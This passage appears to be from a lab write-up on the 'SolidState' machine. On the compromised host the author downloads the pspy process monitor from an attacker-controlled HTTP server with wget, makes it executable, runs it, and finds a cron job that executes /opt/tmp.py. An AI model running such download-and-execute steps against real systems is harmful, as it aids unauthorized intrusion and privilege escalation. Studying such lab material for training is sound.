PSPY


There is a SolidState. I want to see what it’s doing

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ wgewget http://10.10.14.5:8000/pspy32 ; chmod 777 pspy32
4.5:8000/pspy32 ; chmod 777 pspy32
--2023-01-17 23:51:03--  http://10.10.14.5:8000/pspy32
connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 2656352 (2.5M) [application/octet-stream]
saving to: ‘pspy32’
 
pspy32              100%[===================>]   2.53M  4.87MB/s    in 0.5s

pspy transferred to the target system over HTTP

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ ./p./pspy32
./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
 
 
     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒   ██▒▒██▄█▓▒ ▐██▓░
    ▒██▒  ░▒██████▒▒▒██▒ ██▒▓░
    ▒▓▒░  ░▒ ▒▓▒ ░▒▓▒░  ██▒▒▒ 
    ░▒ ░▒ ░░▒     ▓██ ░▒░ 
    ░░  ░░ ░░  
     
     
 
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done

Executing pspy It will capture every process from now on

I knew it! The cronjob is executing a python script located at /opt/tmp.py